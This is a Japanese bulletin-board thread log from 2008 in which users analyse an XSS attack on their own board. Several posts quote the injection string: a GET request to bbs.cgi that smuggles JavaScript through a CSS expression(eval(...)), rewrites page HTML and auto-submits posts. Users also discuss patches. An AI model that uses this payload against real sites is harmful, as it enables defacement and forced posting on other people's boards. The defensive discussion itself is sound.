下へ
> 投稿者:えじじ! 2008/09/27 (土) 05:44:12 ◆ ▼ ◇ [qwerty]> > 寝ます。(;´ω`)
> 漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ!?
今日のログを。(;´ω`)
眠い
参考:2008/09/27(土)05時42分55秒
>えじじ! 2008/09/27 (土) 05:42:55 ◆ ▼ ◇ [qwerty]> 寝ます。(;´ω`)
漏れが来たとたんに固定二人が寝る宣言(;´Д`)いじめ!?
参考:2008/09/27(土)05時41分56秒
> 2008/09/27 (土) 05:42:53 ◆ ▼ ◇ [qwerty]> > 表示件数が30だったらフニャフニャやって123件にする、ところの存在意味が
> > 分からないのでどなたか説明キボリ(;´Д`)
> これは推測だけど、投稿文字列が数字だけだったことを考えると、
> 実際コードとして機能してるのって
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> だけだと思う。submit()走っちゃってるからページ遷移がおこっちゃうので下のコードは
> ただのゴミなんじゃないかしらん。
> でもさすがにエスケープ対策してるから、いったいこのJSがどこで走ってたのかが気になる。
eval
参考:2008/09/27(土)05時38分08秒
>えじじ! 2008/09/27 (土) 05:42:24 ◆ ▼ ◇ [qwerty]> 寝ます。(;´ω`)
一日中エロアニメ転送でもするのかと思った(;´Д`)
参考:2008/09/27(土)05時41分56秒
投稿者:えじじ! 2008/09/27 (土) 05:41:56 ◆ ▼ ◇ [qwerty]寝ます。(;´ω`)
> 2008/09/27 (土) 05:38:08 ◆ ▼ ◇ [qwerty]> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> 表示件数が30だったらフニャフニャやって123件にする、ところの存在意味が
> 分からないのでどなたか説明キボリ(;´Д`)
これは推測だけど、投稿文字列が数字だけだったことを考えると、
実際コードとして機能してるのって
mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
mm.document.forms[0].submit();
だけだと思う。submit()走っちゃってるからページ遷移がおこっちゃうので下のコードは
ただのゴミなんじゃないかしらん。
でもさすがにエスケープ対策してるから、いったいこのJSがどこで走ってたのかが気になる。
参考:2008/09/27(土)05時32分48秒
> 2008/09/27 (土) 05:37:58 ◆ ▼ ◇ [qwerty]> えここのエロアニメが紙芝居だよ(;´Д`)
うちはそうでもないな(;´Д`)しょぼいAtomと1GBメモリだけど
参考:2008/09/27(土)05時36分42秒
2008/09/27 (土) 05:37:51 ◆ ▼ ◇ [qwerty]なんだよホモアニメじゃねえか
2008/09/27 (土) 05:37:21 ◆ ▼ ◇ [qwerty]あーやっとわかった(;´Д`)
"http://(略)/bbs.cgi&渡したい物"
って事かぁ
普通の構文じゃないデスかぁー
2008/09/27 (土) 05:36:42 ◆ ▼ ◇ [qwerty]えここのエロアニメが紙芝居だよ(;´Д`)
2008/09/27 (土) 05:36:07 ◆ ▼ ◇ [qwerty]寝るか(;´Д`)シミ
2008/09/27 (土) 05:34:57 ◆ ▼ ◇ [qwerty]こんな時間なのに38人もいるぜ
2008/09/27 (土) 05:34:55 ◆ ▼ ◇ [qwerty]生き残りたい(;´Д`)生き残りたい
> 2008/09/27 (土) 05:34:19 ◆ ▼ ◇ [qwerty]> 訴えた内容だけ見ると馬鹿かと思うけど講師の授業内容見てると多少は同情する面もあるな(;´Д`)
> http://www.yomiuri.co.jp/e-japan/miyagi/news/20080925-OYT8T00083.htm
個人指導はどうしようもないよね(;´Д`)個人差がありすぎる
参考:2008/09/27(土)05時32分34秒
2008/09/27 (土) 05:34:19 ◆ ▼ ◇ [qwerty]はぁ(;´Д`)Shintani
> 2008/09/27 (土) 05:33:40 ◆ ▼ ◇ [qwerty]> > つまりコードをGETで渡されてうかつにも実行しちゃったって事?
> tだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろリロードするたびに
> 数字がでてたことになるね。
> でもコードが嫌に不完全なんだよね・・・ ocumentとか。
オキュメントって物があるのかもしれない!
参考:2008/09/27(土)05時32分16秒
> 2008/09/27 (土) 05:33:32 ◆ ▼ ◇ [qwerty]> > つまりコードをGETで渡されてうかつにも実行しちゃったって事?
> tだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろリロードするたびに
> 数字がでてたことになるね。
> でもコードが嫌に不完全なんだよね・・・ ocumentとか。
それは俺が加工する際に消しちゃっただけだよ(;´Д`)
参考:2008/09/27(土)05時32分16秒
> 2008/09/27 (土) 05:32:48 ◆ ▼ ◇ [qwerty]> > えー(;´Д`)じゃあヒンヨ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }
表示件数が30だったらフニャフニャやって123件にする、ところの存在意味が
分からないのでどなたか説明キボリ(;´Д`)
参考:2008/09/27(土)05時22分23秒
2008/09/27 (土) 05:32:34 ◆ ▼ ◇ [qwerty]訴えた内容だけ見ると馬鹿かと思うけど講師の授業内容見てると多少は同情する面もあるな(;´Д`)
http://www.yomiuri.co.jp/e-japan/miyagi/news/20080925-OYT8T00083.htm
> 2008/09/27 (土) 05:32:16 ◆ ▼ ◇ [qwerty]> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> つまりコードをGETで渡されてうかつにも実行しちゃったって事?
tだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろリロードするたびに
数字がでてたことになるね。
でもコードが嫌に不完全なんだよね・・・ ocumentとか。
参考:2008/09/27(土)05時26分58秒
>a 2008/09/27 (土) 05:31:57 ◆ ▼ ◇ [qwerty]> > 俺も前まで勘違いしてたんだが
> > くずははCookie使ってないんだわ
> > ただ投稿時の名前を保持してるだけ
> まじで(;´Д`)
その状態でjavascript:alert(document.cookie);
ってアドレスバーに入れてエンター押せば解りやすい
参考:2008/09/27(土)05時29分05秒
> 2008/09/27 (土) 05:31:55 ◆ ▼ ◇ [qwerty]> > http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?u=baka
> > こういうことです
> 出力はしてるけど投稿じゃないでしょ
つかなんでこれGETで出力されんの?(;´Д`)
参考:2008/09/27(土)05時30分01秒
> 2008/09/27 (土) 05:31:24 ◆ ▼ ◇ [qwerty]> 例の妖怪はこっちでバレバレだったせいかりみくすを一斉に上げはじめた
この人何なの(;´Д`)
参考:2008/09/27(土)05時30分29秒
2008/09/27 (土) 05:30:29 ◆ ▼ ◇ [qwerty]例の妖怪はこっちでバレバレだったせいかりみくすを一斉に上げはじめた
2008/09/27 (土) 05:30:26 ◆ ▼ ◇ [qwerty]やぁ、おはよう(´ー`;)
> 2008/09/27 (土) 05:30:01 ◆ ▼ ◇ [qwerty]> > というかそうはなってないでしょ(;´Д`)
> > GETで投稿できたらどんな馬鹿掲示板だよそれ
> http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?u=baka
> こういうことです
出力はしてるけど投稿じゃないでしょ
参考:2008/09/27(土)05時28分32秒
2008/09/27 (土) 05:29:40 ◆ ▼ ◇ [qwerty]えここは朝から変態だなあ(;´Д`)
> 投稿者:a 2008/09/27 (土) 05:29:05 ◆ ▼ ◇ [qwerty]> > Cookieによるハンドル表示はやめるってことかね(;´Д`)
> 俺も前まで勘違いしてたんだが
> くずははCookie使ってないんだわ
> ただ投稿時の名前を保持してるだけ
まじで(;´Д`)
参考:2008/09/27(土)05時27分42秒
> 2008/09/27 (土) 05:28:50 ◆ ▼ ◇ [qwerty]> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> で、これが変数に見えるかね?
変数っていうかソースコードに見えます
実行して内部で乱数で数字作っているような
参考:2008/09/27(土)05時26分03秒
>U2 2008/09/27 (土) 05:28:36 ◆ ▼ ◇ [qwerty]> ああ眠い寝る
> 薬ぬんだ
> 寝る
> おやしみ(;´Д`)キラッ☆ミ
今起きた(;´Д`)U2がこんな時間に起きてるってどういうことよ
参考:2008/09/27(土)05時25分00秒
> 2008/09/27 (土) 05:28:32 ◆ ▼ ◇ [qwerty]> > これが楽そうだな(;´Д`)GETで投稿受け付けなきゃいいんだ
> というかそうはなってないでしょ(;´Д`)
> GETで投稿できたらどんな馬鹿掲示板だよそれ
http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?u=baka
こういうことです
参考:2008/09/27(土)05時26分47秒
> 2008/09/27 (土) 05:27:42 ◆ ▼ ◇ [qwerty]> > ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> > GETの場合保持しない(表示しない)ってのがいいと思うが
> Cookieによるハンドル表示はやめるってことかね(;´Д`)
俺も前まで勘違いしてたんだが
くずははCookie使ってないんだわ
ただ投稿時の名前を保持してるだけ
参考:2008/09/27(土)05時26分15秒
> 2008/09/27 (土) 05:26:58 ◆ ▼ ◇ [qwerty]> > えー(;´Д`)じゃあヒンヨ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }
つまりコードをGETで渡されてうかつにも実行しちゃったって事?
参考:2008/09/27(土)05時22分23秒
2008/09/27 (土) 05:26:54 ◆ ▼ ◇ [qwerty]しかしえここのエロアニメ転送はせっかくのショタなのにたまにヤクザ声が聞こえてきて怖い(;´Д`)
> 2008/09/27 (土) 05:26:47 ◆ ▼ ◇ [qwerty]> > ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> > GETの場合保持しない(表示しない)ってのがいいと思うが
> これが楽そうだな(;´Д`)GETで投稿受け付けなきゃいいんだ
というかそうはなってないでしょ(;´Д`)
GETで投稿できたらどんな馬鹿掲示板だよそれ
参考:2008/09/27(土)05時24分56秒
> 2008/09/27 (土) 05:26:15 ◆ ▼ ◇ [qwerty]> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字コードにしてから無効文字除去してまたsjisに戻るコードの方が綺麗になる気がする
> > 深海さんと協力してブラッシュアップお願いします(;´Д`)
> ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> GETの場合保持しない(表示しない)ってのがいいと思うが
Cookieによるハンドル表示はやめるってことかね(;´Д`)
参考:2008/09/27(土)05時22分57秒
> 2008/09/27 (土) 05:26:03 ◆ ▼ ◇ [qwerty]> > えー(;´Д`)じゃあヒンヨ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }
で、これが変数に見えるかね?
参考:2008/09/27(土)05時22分23秒
> 2008/09/27 (土) 05:26:00 ◆ ▼ ◇ [qwerty]> ああ俺もクアッドほしいなあ(;´Д`)
> 転送したいなあ
> クアッド買おう
漏れもクアッドとかオクタとかほしいけど液晶タブレットもほしい(;´Д`)
参考:2008/09/27(土)05時22分53秒
>U2 2008/09/27 (土) 05:25:42 ◆ ▼ ◇ [qwerty]> ああ眠い寝る
> 薬ぬんだ
> 寝る
> おやしみ(;´Д`)キラッ☆ミ
イラッ(;´Д`)
参考:2008/09/27(土)05時25分00秒
> 2008/09/27 (土) 05:25:15 ◆ ▼ ◇ [qwerty]> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字コードにしてから無効文字除去してまたsjisに戻るコードの方が綺麗になる気がする
> > 深海さんと協力してブラッシュアップお願いします(;´Д`)
> これはどうよ(;´Д`)
> http://d.hatena.ne.jp/tociyuki/20060923/1158984768
Jcode.pmに置き換えるのが簡単ならそれが一番スマートかな(;´Д`)
参考:2008/09/27(土)05時23分40秒
> 2008/09/27 (土) 05:25:02 ◆ ▼ ◇ [qwerty]> まぁ今回のアイドルランクアップはスクリプト投稿した香具師とえじじ!とムキーの絵描きだな(;´Д`)お疲れ様でした。
暫定対策しかしてない人より最終的にI_RCで対策考えた住人も評価しようよ(;´Д`)
参考:2008/09/27(土)05時19分28秒
投稿者:U2 2008/09/27 (土) 05:25:00 ◆ ▼ ◇ [qwerty]ああ眠い寝る
薬ぬんだ
寝る
おやしみ(;´Д`)キラッ☆ミ
上へ